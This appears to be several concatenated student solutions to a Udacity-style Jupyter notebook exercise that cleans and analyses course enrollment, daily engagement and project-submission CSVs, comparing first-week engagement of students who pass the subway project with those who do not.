lessons_completed_by_account = sum_grouped_items(engagement_by_account, 'lessons_completed')
describe_data(lessons_completed_by_account)
###Output
Mean: 1.636180904522613
Standard deviation: 3.002561299829423
Minimum: 0
Maximum: 36
###Markdown
Number of Visits in First Week
###Code
######################################
# 10 #
######################################
## Find the mean, standard deviation, minimum, and maximum for the number of
## days each student visits the classroom during the first week.
days_visited_by_account = sum_grouped_items(engagement_by_account, 'has_visited')
describe_data(days_visited_by_account)
###Output
Mean: 2.8673366834170855
Standard deviation: 2.2551980029196814
Minimum: 0
Maximum: 7
###Markdown
Splitting out Passing Students
###Code
######################################
# 11 #
######################################
## Create two lists of engagement data for paid students in the first week.
## The first list should contain data for students who eventually pass the
## subway project, and the second list should contain data for students
## who do not.
subway_project_lesson_keys = ['746169184', '3176718735']
passing_engagement =
non_passing_engagement =
###Output
_____no_output_____
###Markdown
Comparing the Two Student Groups
###Code
######################################
# 12 #
######################################
## Compute some metrics you're interested in and see how they differ for
## students who pass the subway project vs. students who don't. A good
## starting point would be the metrics we looked at earlier (minutes spent
## in the classroom, lessons completed, and days visited).
###Output
_____no_output_____
###Markdown
Making Histograms
###Code
######################################
# 13 #
######################################
## Make histograms of the three metrics we looked at earlier for both
## students who passed the subway project and students who didn't. You
## might also want to make histograms of any other metrics you examined.
###Output
_____no_output_____
###Markdown
Improving Plots and Sharing Findings
###Code
######################################
# 14 #
######################################
## Make a more polished version of at least one of your visualizations
## from earlier. Try importing the seaborn library to make the visualization
## look better, adding axis labels and a title, and changing one or more
## arguments to the hist() function.
###Output
_____no_output_____
###Markdown
Before we get started, a couple of reminders to keep in mind when using iPython notebooks:- Remember that you can see from the left side of a code cell when it was last run if there is a number within the brackets.- When you start a new notebook session, make sure you run all of the cells up to the point where you last left off. Even if the output is still visible from when you ran the cells in your previous session, the kernel starts in a fresh state so you'll need to reload the data, etc. on a new session.- The previous point is useful to keep in mind if your answers do not match what is expected in the lesson's quizzes. Try reloading the data and run all of the processing steps one by one in order to make sure that you are working with the same variables and data that are at each quiz stage. Load Data from CSVs
###Code
import unicodecsv
## Longer version of code (replaced with shorter, equivalent version below)
# enrollments = []
# f = open('enrollments.csv', 'rb')
# reader = unicodecsv.DictReader(f)
# for row in reader:
# enrollments.append(row)
# f.close()
def read_csv(filename):
with open(filename, 'rb') as f:
reader = unicodecsv.DictReader(f)
return list(reader)
enrollments = read_csv('enrollments.csv')
print(enrollments[0])
#####################################
# 1 #
#####################################
## Read in the data from daily_engagement.csv and project_submissions.csv
## and store the results in the below variables.
## Then look at the first row of each table.
daily_engagement = read_csv('daily_engagement.csv')
project_submissions = read_csv('project_submissions.csv')
print(daily_engagement[0])
###Output
{'lessons_completed': '0.0', 'projects_completed': '0.0', 'utc_date': '2015-01-09', 'num_courses_visited': '1.0', 'acct': '0', 'total_minutes_visited': '11.6793745'}
###Markdown
Fixing Data Types
###Code
from datetime import datetime as dt
# Takes a date as a string, and returns a Python datetime object.
# If there is no date given, returns None
def parse_date(date):
if date == '':
return None
else:
return dt.strptime(date, '%Y-%m-%d')
# Takes a string which is either an empty string or represents an integer,
# and returns an int or None.
def parse_maybe_int(i):
if i == '':
return None
else:
return int(i)
# Clean up the data types in the enrollments table
for enrollment in enrollments:
enrollment['cancel_date'] = parse_date(enrollment['cancel_date'])
enrollment['days_to_cancel'] = parse_maybe_int(enrollment['days_to_cancel'])
enrollment['is_canceled'] = enrollment['is_canceled'] == 'True'
enrollment['is_udacity'] = enrollment['is_udacity'] == 'True'
enrollment['join_date'] = parse_date(enrollment['join_date'])
enrollments[0]
# Clean up the data types in the engagement table
for engagement_record in daily_engagement:
engagement_record['lessons_completed'] = int(float(engagement_record['lessons_completed']))
engagement_record['num_courses_visited'] = int(float(engagement_record['num_courses_visited']))
engagement_record['projects_completed'] = int(float(engagement_record['projects_completed']))
engagement_record['total_minutes_visited'] = float(engagement_record['total_minutes_visited'])
engagement_record['utc_date'] = parse_date(engagement_record['utc_date'])
#####################################
# 3 #
#####################################
## Rename the "acct" column in the daily_engagement table to "account_key".
for a in daily_engagement:
a['account_key'] = a['acct']
del a['acct']
daily_engagement[0]
# Clean up the data types in the submissions table
for submission in project_submissions:
submission['completion_date'] = parse_date(submission['completion_date'])
submission['creation_date'] = parse_date(submission['creation_date'])
project_submissions[0]
###Output
_____no_output_____
###Markdown
Note when running the above cells that we are actively changing the contents of our data variables. If you try to run these cells multiple times in the same session, an error will occur. Investigating the Data
###Code
#####################################
# 2 #
#####################################
## Find the total number of rows and the number of unique students (account keys)
## in each table.
def get_unique_students(inVar):
unique_students = set()
for a in inVar:
unique_students.add(a['account_key'])
return unique_students
enrollment_num_rows = len(enrollments)
enrollment_num_unique_students = len(get_unique_students(enrollments))
engagement_num_rows = len(daily_engagement)
unique_engagements = get_unique_students(daily_engagement)
engagement_num_unique_students = len(unique_engagements)
submission_num_rows = len(project_submissions)
submission_num_unique_students = len(get_unique_students(project_submissions))
print(enrollment_num_unique_students)
print(engagement_num_unique_students)
print(submission_num_unique_students)
###Output
1302
1237
743
###Markdown
Problems in the Data
###Code
print(daily_engagement[0]['account_key'])
###Output
0
###Markdown
Missing Engagement Records
###Code
#####################################
# 4 #
#####################################
## Find any one student enrollments where the student is missing from the daily engagement table.
## Output that enrollment.
for a in enrollments:
if a['account_key'] not in unique_engagements:
print(a)
break
###Output
{'account_key': '1219', 'days_to_cancel': 0, 'is_canceled': True, 'status': 'canceled', 'is_udacity': False, 'cancel_date': datetime.datetime(2014, 11, 12, 0, 0), 'join_date': datetime.datetime(2014, 11, 12, 0, 0)}
###Markdown
Checking for More Problem Records
###Code
#####################################
# 5 #
#####################################
## Find the number of surprising data points (enrollments missing from
## the engagement table) that remain, if any.
for a in enrollments:
if a['account_key'] not in unique_engagements and a['join_date'] != a['cancel_date']:
print(a)
###Output
{'account_key': '1304', 'days_to_cancel': 59, 'is_canceled': True, 'status': 'canceled', 'is_udacity': True, 'cancel_date': datetime.datetime(2015, 3, 10, 0, 0), 'join_date': datetime.datetime(2015, 1, 10, 0, 0)}
{'account_key': '1304', 'days_to_cancel': 99, 'is_canceled': True, 'status': 'canceled', 'is_udacity': True, 'cancel_date': datetime.datetime(2015, 6, 17, 0, 0), 'join_date': datetime.datetime(2015, 3, 10, 0, 0)}
{'account_key': '1101', 'days_to_cancel': None, 'is_canceled': False, 'status': 'current', 'is_udacity': True, 'cancel_date': None, 'join_date': datetime.datetime(2015, 2, 25, 0, 0)}
###Markdown
Tracking Down the Remaining Problems
###Code
# Create a set of the account keys for all Udacity test accounts
udacity_test_accounts = set()
for enrollment in enrollments:
if enrollment['is_udacity']:
udacity_test_accounts.add(enrollment['account_key'])
len(udacity_test_accounts)
# Given some data with an account_key field, removes any records corresponding to Udacity test accounts
def remove_udacity_accounts(data):
non_udacity_data = []
for data_point in data:
if data_point['account_key'] not in udacity_test_accounts:
non_udacity_data.append(data_point)
return non_udacity_data
# Remove Udacity test accounts from all three tables
non_udacity_enrollments = remove_udacity_accounts(enrollments)
non_udacity_engagement = remove_udacity_accounts(daily_engagement)
non_udacity_submissions = remove_udacity_accounts(project_submissions)
print(len(non_udacity_enrollments))
print(len(non_udacity_engagement))
print(len(non_udacity_submissions))
###Output
1622
135656
3634
###Markdown
Refining the Question
###Code
#####################################
# 6 #
#####################################
## Create a dictionary named paid_students containing all students who either
## haven't canceled yet or who remained enrolled for more than 7 days. The keys
## should be account keys, and the values should be the date the student enrolled.
paid_students = {}
for a in non_udacity_enrollments:
if (not a['is_canceled'] or a['days_to_cancel'] > 7) and (a['account_key'] not in paid_students or a['join_date'] > paid_students[a['account_key']]):
paid_students[a['account_key']] = a['join_date']
print(len(paid_students))
###Output
995
###Markdown
Getting Data from First Week
###Code
# Takes a student's join date and the date of a specific engagement record,
# and returns True if that engagement record happened within one week
# of the student joining.
def within_one_week(join_date, engagement_date):
time_delta = engagement_date - join_date
return time_delta.days < 7 and time_delta.days >=0
#####################################
# 7 #
#####################################
## Create a list of rows from the engagement table including only rows where
## the student is one of the paid students you just found, and the date is within
## one week of the student's join date.
paid_enrollments = [a for a in non_udacity_enrollments if a['account_key'] in paid_students.keys()]
paid_engagements = [a for a in non_udacity_engagement if a['account_key'] in paid_students.keys()]
paid_submissions = [a for a in non_udacity_submissions if a['account_key'] in paid_students.keys()]
for rec in paid_engagements:
rec['has_visited'] = 1 if rec['num_courses_visited'] > 0 else 0
paid_engagement_in_first_week =[a for a in paid_engagements if within_one_week(paid_students[a['account_key']], a['utc_date'])]
print(len(paid_engagement_in_first_week))
###Output
6919
###Markdown
Exploring Student Engagement
###Code
from collections import defaultdict
# Create a dictionary of engagement grouped by student.
# The keys are account keys, and the values are lists of engagement records.
def group_by_key(inList, inKey):
recs_by_account = defaultdict(list)
for rec in inList:
recs_by_account[rec[inKey]].append(rec)
return recs_by_account
engagement_by_account = group_by_key(paid_engagement_in_first_week, 'account_key')
# Create a dictionary with the total minutes each student spent in the classroom during the first week.
# The keys are account keys, and the values are numbers (total minutes)
def get_totals_by_acct_for_key(inDict, inKey):
total_by_account = {}
for key, rec in inDict.items():
total = 0
for subRec in rec:
total += subRec[inKey]
total_by_account[key] = total
return total_by_account
total_minutes_by_account = get_totals_by_acct_for_key(engagement_by_account, 'total_minutes_visited')
import numpy as np
def get_statistics(inDict):
total = list(inDict.values())
print('Mean:', np.mean(total))
print('Standard deviation:', np.std(total))
print('Minimum:', np.min(total))
print('Maximum:', np.max(total))
# Summarize the data about minutes spent in the classroom
get_statistics(total_minutes_by_account)
###Output
Mean: 306.708326753
Standard deviation: 412.996933409
Minimum: 0.0
Maximum: 3564.7332645
###Markdown
Debugging Data Analysis Code
###Code
#####################################
# 8 #
#####################################
## Go through a similar process as before to see if there is a problem.
## Locate at least one surprising piece of data, output it, and take a look at it.
for key, val in total_minutes_by_account.items():
if val > 3500:
print(engagement_by_account[key])
###Output
[{'lessons_completed': 4, 'account_key': '163', 'projects_completed': 0, 'utc_date': datetime.datetime(2015, 7, 9, 0, 0), 'has_visited': 1, 'num_courses_visited': 4, 'has_visisted': 1, 'total_minutes_visited': 850.519339666}, {'lessons_completed': 6, 'account_key': '163', 'projects_completed': 0, 'utc_date': datetime.datetime(2015, 7, 10, 0, 0), 'has_visited': 1, 'num_courses_visited': 6, 'has_visisted': 1, 'total_minutes_visited': 872.633923334}, {'lessons_completed': 6, 'account_key': '163', 'projects_completed': 0, 'utc_date': datetime.datetime(2015, 7, 11, 0, 0), 'has_visited': 1, 'num_courses_visited': 2, 'has_visisted': 1, 'total_minutes_visited': 777.018903666}, {'lessons_completed': 2, 'account_key': '163', 'projects_completed': 0, 'utc_date': datetime.datetime(2015, 7, 12, 0, 0), 'has_visited': 1, 'num_courses_visited': 1, 'has_visisted': 0, 'total_minutes_visited': 294.568774}, {'lessons_completed': 1, 'account_key': '163', 'projects_completed': 0, 'utc_date': datetime.datetime(2015, 7, 13, 0, 0), 'has_visited': 1, 'num_courses_visited': 3, 'has_visisted': 1, 'total_minutes_visited': 471.2139785}, {'lessons_completed': 1, 'account_key': '163', 'projects_completed': 0, 'utc_date': datetime.datetime(2015, 7, 14, 0, 0), 'has_visited': 1, 'num_courses_visited': 2, 'has_visisted': 1, 'total_minutes_visited': 298.778345333}, {'lessons_completed': 0, 'account_key': '163', 'projects_completed': 0, 'utc_date': datetime.datetime(2015, 7, 15, 0, 0), 'has_visited': 0, 'num_courses_visited': 0, 'has_visisted': 0, 'total_minutes_visited': 0.0}]
###Markdown
Lessons Completed in First Week
###Code
#####################################
# 9 #
#####################################
## Adapt the code above to find the mean, standard deviation, minimum, and maximum for
## the number of lessons completed by each student during the first week. Try creating
## one or more functions to re-use the code above.
total_lessons_by_account = get_totals_by_acct_for_key(engagement_by_account, 'lessons_completed')
get_statistics(total_lessons_by_account)
###Output
Mean: 1.63618090452
Standard deviation: 3.00256129983
Minimum: 0
Maximum: 36
###Markdown
Number of Visits in First Week
###Code
######################################
# 10 #
######################################
## Find the mean, standard deviation, minimum, and maximum for the number of
## days each student visits the classroom during the first week.
num_times_visited_by_acct = get_totals_by_acct_for_key(engagement_by_account, 'has_visited')
get_statistics(num_times_visited_by_acct)
###Output
Mean: 2.86733668342
Standard deviation: 2.25519800292
Minimum: 0
Maximum: 7
###Markdown
Splitting out Passing Students
###Code
######################################
# 11 #
######################################
## Create two lists of engagement data for paid students in the first week.
## The first list should contain data for students who eventually pass the
## subway project, and the second list should contain data for students
## who do not.
subway_project_lesson_keys = ['746169184', '3176718735']
passing_keys = ['PASSED', 'DISTINCTION']
passed_subway_project = set(a['account_key'] for a in paid_submissions if a['lesson_key'] in subway_project_lesson_keys and a['assigned_rating'] in passing_keys)
passing_engagement = [a for a in paid_engagement_in_first_week if a['account_key'] in passed_subway_project]
non_passing_engagement =[a for a in paid_engagement_in_first_week if a['account_key'] not in passed_subway_project]
print(len(passing_engagement))
print(len(non_passing_engagement))
###Output
4527
2392
###Markdown
Comparing the Two Student Groups
###Code
######################################
# 12 #
######################################
## Compute some metrics you're interested in and see how they differ for
## students who pass the subway project vs. students who don't. A good
## starting point would be the metrics we looked at earlier (minutes spent
## in the classroom, lessons completed, and days visited).
###Output
_____no_output_____
###Markdown
Making Histograms
###Code
######################################
# 13 #
######################################
## Make histograms of the three metrics we looked at earlier for both
## students who passed the subway project and students who didn't. You
## might also want to make histograms of any other metrics you examined.
###Output
_____no_output_____
###Markdown
Improving Plots and Sharing Findings
###Code
######################################
# 14 #
######################################
## Make a more polished version of at least one of your visualizations
## from earlier. Try importing the seaborn library to make the visualization
## look better, adding axis labels and a title, and changing one or more
## arguments to the hist() function.
###Output
_____no_output_____
###Markdown
Before we get started, a couple of reminders to keep in mind when using iPython notebooks:- Remember that you can see from the left side of a code cell when it was last run if there is a number within the brackets.- When you start a new notebook session, make sure you run all of the cells up to the point where you last left off. Even if the output is still visible from when you ran the cells in your previous session, the kernel starts in a fresh state so you'll need to reload the data, etc. on a new session.- The previous point is useful to keep in mind if your answers do not match what is expected in the lesson's quizzes. Try reloading the data and run all of the processing steps one by one in order to make sure that you are working with the same variables and data that are at each quiz stage. Load Data from CSVs
###Code
import unicodecsv
## Longer version of code (replaced with shorter, equivalent version below)
# enrollments = []
# f = open('enrollments.csv', 'rb')
# reader = unicodecsv.DictReader(f)
# for row in reader:
# enrollments.append(row)
# f.close()
def open_csv(filename):
with open(filename, 'rb') as f:
reader = unicodecsv.DictReader(f)
return list(reader)
#####################################
# 1 #
#####################################
## Read in the data from daily_engagement.csv and project_submissions.csv
## and store the results in the below variables.
## Then look at the first row of each table.
enrollments = open_csv('enrollments.csv')
daily_engagement = open_csv('daily_engagement.csv')
project_submissions = open_csv('project_submissions.csv')
print enrollments[0]
print daily_engagement[0]
print project_submissions[0]
###Output
{u'status': u'canceled', u'is_udacity': u'True', u'is_canceled': u'True', u'join_date': u'2014-11-10', u'account_key': u'448', u'cancel_date': u'2015-01-14', u'days_to_cancel': u'65'}
{u'lessons_completed': u'0.0', u'num_courses_visited': u'1.0', u'total_minutes_visited': u'11.6793745', u'projects_completed': u'0.0', u'acct': u'0', u'utc_date': u'2015-01-09'}
{u'lesson_key': u'3176718735', u'processing_state': u'EVALUATED', u'account_key': u'256', u'assigned_rating': u'UNGRADED', u'completion_date': u'2015-01-16', u'creation_date': u'2015-01-14'}
###Markdown
Fixing Data Types
###Code
from datetime import datetime as dt
# Takes a date as a string, and returns a Python datetime object.
# If there is no date given, returns None
def parse_date(date):
if date == '':
return None
else:
return dt.strptime(date, '%Y-%m-%d')
# Takes a string which is either an empty string or represents an integer,
# and returns an int or None.
def parse_maybe_int(i):
if i == '':
return None
else:
return int(i)
# Clean up the data types in the enrollments table
for enrollment in enrollments:
enrollment['cancel_date'] = parse_date(enrollment['cancel_date'])
enrollment['days_to_cancel'] = parse_maybe_int(enrollment['days_to_cancel'])
enrollment['is_canceled'] = enrollment['is_canceled'] == 'True'
enrollment['is_udacity'] = enrollment['is_udacity'] == 'True'
enrollment['join_date'] = parse_date(enrollment['join_date'])
enrollments[0]
# Clean up the data types in the engagement table
for engagement_record in daily_engagement:
engagement_record['lessons_completed'] = int(float(engagement_record['lessons_completed']))
engagement_record['num_courses_visited'] = int(float(engagement_record['num_courses_visited']))
engagement_record['projects_completed'] = int(float(engagement_record['projects_completed']))
engagement_record['total_minutes_visited'] = float(engagement_record['total_minutes_visited'])
engagement_record['utc_date'] = parse_date(engagement_record['utc_date'])
daily_engagement[0]
# Clean up the data types in the submissions table
for submission in project_submissions:
submission['completion_date'] = parse_date(submission['completion_date'])
submission['creation_date'] = parse_date(submission['creation_date'])
project_submissions[0]
###Output
_____no_output_____
###Markdown
Note when running the above cells that we are actively changing the contents of our data variables. If you try to run these cells multiple times in the same session, an error will occur. Investigating the Data
###Code
## Rename the "acct" column in the daily_engagement table to "account_key".
for engagement_record in daily_engagement:
engagement_record['account_key'] = engagement_record['acct']
del engagement_record['acct']
#####################################
# 2 #
#####################################
## Find the total number of rows and the number of unique students (account keys)
## in each table.
def get_num_unique_students(data):
return set(map(lambda x: x['account_key'], data))
enrollment_unique_students = get_num_unique_students(enrollments)
engagement_unique_students = get_num_unique_students(daily_engagement)
submission_unique_students = get_num_unique_students(project_submissions)
print 'Enrollment Rows:', len(enrollments)
print 'Enrollment Students:', len(enrollment_unique_students)
print 'Engagement Rows:', len(daily_engagement)
print 'Engagement Students:', len(engagement_unique_students)
print 'Submission Rows:', len(project_submissions)
print 'Submission Students:', len(submission_unique_students)
###Output
Enrollment Rows: 1640
Enrollment Students: 1302
Engagement Rows: 136240
Engagement Students: 1237
Submission Rows: 3642
Submission Students: 743
###Markdown
Problems in the Data
###Code
daily_engagement[0]['account_key']
###Output
_____no_output_____
###Markdown
Missing Engagement Records
###Code
#####################################
# 4 #
#####################################
## Find any one student enrollments where the student is missing from the daily engagement table.
## Output that enrollment.
for enrollment_record in enrollments:
if enrollment_record['account_key'] not in engagement_unique_students and not enrollment_record['cancel_date']:
print enrollment_record
break
###Output
{u'status': u'current', u'is_udacity': True, u'is_canceled': False, u'join_date': datetime.datetime(2015, 2, 25, 0, 0), u'account_key': u'1101', u'cancel_date': None, u'days_to_cancel': None}
###Markdown
Checking for More Problem Records
###Code
#####################################
# 5 #
#####################################
## Find the number of surprising data points (enrollments missing from
## the engagement table) that remain, if any.
for enrollment_record in enrollments:
student = enrollment_record['account_key']
days_to_cancel = enrollment_record['days_to_cancel']
if student not in engagement_unique_students \
and days_to_cancel != 0:
print enrollment_record
a = set()
a.add(12)
a
###Output
_____no_output_____
###Markdown
Tracking Down the Remaining Problems
###Code
# Create a set of the account keys for all Udacity test accounts
udacity_test_accounts = set()
for enrollment in enrollments:
if enrollment['is_udacity']:
udacity_test_accounts.add(enrollment['account_key'])
len(udacity_test_accounts)
# Given some data with an account_key field, removes any records corresponding to Udacity test accounts
def remove_udacity_accounts(data):
non_udacity_data = []
for data_point in data:
if data_point['account_key'] not in udacity_test_accounts:
non_udacity_data.append(data_point)
return non_udacity_data
# Remove Udacity test accounts from all three tables
non_udacity_enrollments = remove_udacity_accounts(enrollments)
non_udacity_engagement = remove_udacity_accounts(daily_engagement)
non_udacity_submissions = remove_udacity_accounts(project_submissions)
print len(non_udacity_enrollments)
print len(non_udacity_engagement)
print len(non_udacity_submissions)
###Output
1622
135656
3634
###Markdown
Refining the Question
###Code
#####################################
# 6 #
#####################################
## Create a dictionary named paid_students containing all students who either
## haven't canceled yet or who remained enrolled for more than 7 days. The keys
## should be account keys, and the values should be the date the student enrolled.
paid_students = {}
for enrollment_record in non_udacity_enrollments:
days_to_cancel = enrollment_record['days_to_cancel']
if days_to_cancel == None or days_to_cancel > 7:
account_key = enrollment_record['account_key']
enrollment_date = enrollment_record['join_date']
if account_key not in paid_students \
or enrollment_date > paid_students[account_key]:
paid_students[account_key] = enrollment_date
len(paid_students)
###Output
_____no_output_____
###Markdown
Getting Data from First Week
###Code
# Takes a student's join date and the date of a specific engagement record,
# and returns True if that engagement record happened within one week
# of the student joining.
def within_one_week(join_date, engagement_date):
time_delta = engagement_date - join_date
return time_delta.days < 7 and time_delta.days >= 0
def remove_free_trial_cancels(data):
new_data = []
for data_point in data:
if data_point['account_key'] in paid_students:
new_data.append(data_point)
return new_data
# Remove free trial
paid_enrollments = remove_free_trial_cancels(non_udacity_enrollments)
paid_engagement = remove_free_trial_cancels(non_udacity_engagement)
paid_submissions = remove_free_trial_cancels(non_udacity_submissions)
print len(paid_enrollments)
print len(paid_engagement)
print len(paid_submissions)
for data_point in paid_engagement:
data_point['has_visited'] = 1 if data_point['num_courses_visited'] > 0 else 0
paid_engagement[0]
#####################################
# 7 #
#####################################
## Create a list of rows from the engagement table including only rows where
## the student is one of the paid students you just found, and the date is within
## one week of the student's join date.
paid_engagement_in_first_week = []
for engagement in paid_engagement:
account_key = engagement['account_key']
if within_one_week(paid_students[account_key],
engagement['utc_date']):
paid_engagement_in_first_week.append(engagement)
len(paid_engagement_in_first_week)
###Output
_____no_output_____
###Markdown
Exploring Student Engagement
###Code
from collections import defaultdict
# Create a dictionary of engagement grouped by student.
# The keys are account keys, and the values are lists of engagement records.
def group_data(data, key_name):
grouped_data = defaultdict(list)
for data_point in data:
key = data_point[key_name]
grouped_data[key].append(data_point)
return grouped_data
engagement_by_account = group_data(paid_engagement_in_first_week,
'account_key')
# Create a dictionary with the total minutes each student spent in the classroom during the first week.
# The keys are account keys, and the values are numbers (total minutes)
def sum_grouped_items(grouped_data, field_name):
summed_data = {}
for key, data_points in grouped_data.items():
total = 0
for data_point in data_points:
total += data_point[field_name]
summed_data[key] = total
return summed_data
total_minutes_by_account = sum_grouped_items(engagement_by_account,
'total_minutes_visited')
import numpy as np
def dscript_data(data):
print 'Mean:', np.mean(data)
print 'Standard deviation:', np.std(data)
print 'Minimum:', np.min(data)
print 'Maximum:', np.max(data)
dscript_data(total_minutes_by_account.values())
###Output
Mean: 306.708326753
Standard deviation: 412.996933409
Minimum: 0.0
Maximum: 3564.7332645
###Markdown
Debugging Data Analysis Code
###Code
#####################################
# 8 #
#####################################
## Go through a similar process as before to see if there is a problem.
## Locate at least one surprising piece of data, output it, and take a look at it.
student_with_max_minutes = None
max_minutes = 0
for student, total_minutes in total_minutes_by_account.items():
if total_minutes > max_minutes:
max_minutes = total_minutes
student_with_max_minutes = student
max_minutes
engagement_by_account[student_with_max_minutes]
###Output
_____no_output_____
###Markdown
Lessons Completed in First Week
###Code
#####################################
# 9 #
#####################################
## Adapt the code above to find the mean, standard deviation, minimum, and maximum for
## the number of lessons completed by each student during the first week. Try creating
## one or more functions to re-use the code above.
total_lessons_completed_by_account = sum_grouped_items(engagement_by_account,
'lessons_completed')
len(total_lessons_completed_by_account)
dscript_data(total_lessons_completed_by_account.values())
###Output
Mean: 1.63618090452
Standard deviation: 3.00256129983
Minimum: 0
Maximum: 36
###Markdown
Number of Visits in First Week
###Code
######################################
# 10 #
######################################
## Find the mean, standard deviation, minimum, and maximum for the number of
## days each student visits the classroom during the first week.
num_visits_by_account = sum_grouped_items(engagement_by_account, 'has_visited')
dscript_data(num_visits_by_account.values())
assigned_rating = set()
for data_point in paid_submissions:
assigned_rating.add(data_point['assigned_rating'])
assigned_rating
###Output
_____no_output_____
###Markdown
Splitting out Passing Students
###Code
######################################
# 11 #
######################################
## Create two lists of engagement data for paid students in the first week.
## The first list should contain data for students who eventually pass the
## subway project, and the second list should contain data for students
## who do not.
subway_project_lesson_keys = ['746169184', '3176718735']
passing_engagement = []
non_passing_engagement = []
passed_account_id = set()
for submission_record in paid_submissions:
if submission_record['lesson_key'] in subway_project_lesson_keys \
and submission_record['assigned_rating'] in ['PASSED', 'DISTINCTION']:
passed_account_id.add(submission_record['account_key'])
for engagement_record in paid_engagement_in_first_week:
if engagement_record['account_key'] in passed_account_id:
passing_engagement.append(engagement_record)
else:
non_passing_engagement.append(engagement_record)
print 'passing_engagement:', len(passing_engagement)
print 'non_passing_engagement:', len(non_passing_engagement)
###Output
passing_engagement: 4527
non_passing_engagement: 2392
###Markdown
Comparing the Two Student Groups
###Code
######################################
# 12 #
######################################
## Compute some metrics you're interested in and see how they differ for
## students who pass the subway project vs. students who don't. A good
## starting point would be the metrics we looked at earlier (minutes spent
## in the classroom, lessons completed, and days visited).
def descript_metrics(data, keys):
grouped_data = group_data(data, 'account_key')
for key in keys:
print key
total_by_key = sum_grouped_items(grouped_data, key)
dscript_data(total_by_key.values())
keys = ['total_minutes_visited', 'lessons_completed', 'has_visited']
descript_metrics(passing_engagement, keys)
descript_metrics(non_passing_engagement, keys)
data = [1, 2, 1, 3, 3, 1, 4, 2]
%matplotlib inline
%config InlineBackend.figure_format = 'retina'
import matplotlib.pyplot as plt
import seaborn as sns
plt.hist(data)
###Output
_____no_output_____
###Markdown
Making Histograms
###Code
######################################
# 13 #
######################################
## Make histograms of the three metrics we looked at earlier for both
## students who passed the subway project and students who didn't. You
## might also want to make histograms of any other metrics you examined.
def histongrams_metrics(key):
for data in [passing_engagement, non_passing_engagement]:
grouped_data = group_data(data, 'account_key')
print key
total_by_key = sum_grouped_items(grouped_data, key)
plt.hist(total_by_key.values(), bins=8)
histongrams_metrics('total_minutes_visited')
histongrams_metrics('lessons_completed')
histongrams_metrics('has_visited')
###Output
has_visited
has_visited
###Markdown
Improving Plots and Sharing Findings
###Code
######################################
# 14 #
######################################
## Make a more polished version of at least one of your visualizations
## from earlier. Try importing the seaborn library to make the visualization
## look better, adding axis labels and a title, and changing one or more
## arguments to the hist() function.
###Output
_____no_output_____
###Markdown
Before we get started, a couple of reminders to keep in mind when using iPython notebooks:- Remember that you can see from the left side of a code cell when it was last run if there is a number within the brackets.- When you start a new notebook session, make sure you run all of the cells up to the point where you last left off. Even if the output is still visible from when you ran the cells in your previous session, the kernel starts in a fresh state so you'll need to reload the data, etc. on a new session.- The previous point is useful to keep in mind if your answers do not match what is expected in the lesson's quizzes. Try reloading the data and run all of the processing steps one by one in order to make sure that you are working with the same variables and data that are at each quiz stage. Load Data from CSVs
###Code
import unicodecsv
def read_csv(filename):
with open(filename, 'rb') as f:
reader = unicodecsv.DictReader(f)
return list(reader)
enrollments = read_csv('enrollments.csv')
daily_engagement = read_csv('daily_engagement.csv')
project_submissions = read_csv('project_submissions.csv')
enrollments[0]
daily_engagement[0]
project_submissions[0]
###Output
_____no_output_____
###Markdown
Fixing Data Types
###Code
from datetime import datetime as dt
# Takes a date as a string, and returns a Python datetime object.
# If there is no date given, returns None
def parse_date(date):
if date == '':
return None
else:
return dt.strptime(date, '%Y-%m-%d')
# Takes a string which is either an empty string or represents an integer,
# and returns an int or None.
def parse_maybe_int(i):
if i == '':
return None
else:
return int(i)
# Clean up the data types in the enrollments table
for enrollment in enrollments:
enrollment['cancel_date'] = parse_date(enrollment['cancel_date'])
enrollment['days_to_cancel'] = parse_maybe_int(enrollment['days_to_cancel'])
enrollment['is_canceled'] = enrollment['is_canceled'] == 'True'
enrollment['is_udacity'] = enrollment['is_udacity'] == 'True'
enrollment['join_date'] = parse_date(enrollment['join_date'])
enrollments[0]
# Clean up the data types in the engagement table
for engagement_record in daily_engagement:
engagement_record['lessons_completed'] = int(float(engagement_record['lessons_completed']))
engagement_record['num_courses_visited'] = int(float(engagement_record['num_courses_visited']))
engagement_record['projects_completed'] = int(float(engagement_record['projects_completed']))
engagement_record['total_minutes_visited'] = float(engagement_record['total_minutes_visited'])
engagement_record['utc_date'] = parse_date(engagement_record['utc_date'])
daily_engagement[0]
# Clean up the data types in the submissions table
for submission in project_submissions:
submission['completion_date'] = parse_date(submission['completion_date'])
submission['creation_date'] = parse_date(submission['creation_date'])
project_submissions[0]
###Output
_____no_output_____
###Markdown
Note when running the above cells that we are actively changing the contents of our data variables. If you try to run these cells multiple times in the same session, an error will occur. Investigating the Data
###Code
#####################################
# 2 #
#####################################
## Find the total number of rows and the number of unique students (account keys)
## in each table.
def uniquenum(filename):
s = set()
for row in filename:
s.add(row['account_key'])
return len(s)
def unique_list(filename):
r = set()
for row in filename:
r.add(row['acct'])
return len(r)
enrollment_num_rows = len(enrollments) # Replace this with your code
enrollment_num_unique_students = uniquenum(enrollments) # Replace this with your code
engagement_num_rows = len(daily_engagement) # Replace this with your code
engagement_num_unique_students = unique_list(daily_engagement) # Replace this with your code
submission_num_rows = len(project_submissions) # Replace this with your code
submission_num_unique_students = uniquenum(project_submissions) # Replace this with your code
print('enrollment_num_rows:', enrollment_num_rows)
print('enrollment_num_unique_students:', enrollment_num_unique_students)
print('engagement_num_rows:', engagement_num_rows)
print('engagement_num_unique_students:', engagement_num_unique_students)
print('submission_num_rows:', submission_num_rows)
print('submission_num_unique_students:', submission_num_unique_students)
###Output
('enrollment_num_rows:', 1640)
('enrollment_num_unique_students:', 1302)
('engagement_num_rows:', 136240)
('engagement_num_unique_students:', 1237)
('submission_num_rows:', 3642)
('submission_num_unique_students:', 743)
###Markdown
Problems in the Data
###Code
#####################################
# 3 #
#####################################
## Rename the "acct" column in the daily_engagement table to "account_key".
for engagement_record in daily_engagement:
engagement_record['account_key'] = engagement_record['acct']
del[engagement_record['acct']]
print(daily_engagement[0]['account_key'])
###Output
0
###Markdown
Missing Engagement Records
###Code
#####################################
# 4 #
#####################################
## Find any one student enrollments where the student is missing from the daily engagement table.
## Output that enrollment.
def unique_students(table):
s = set()
for row in table:
s.add(row['account_key'])
return s
unique_engagement_students = unique_students(daily_engagement)
unique_enrolled_students = unique_students(enrollments)
for enrollment in enrollments:
unique_enrolled_student = enrollment['account_key']
if unique_enrolled_student not in unique_engagement_students:
print enrollment
break
###Output
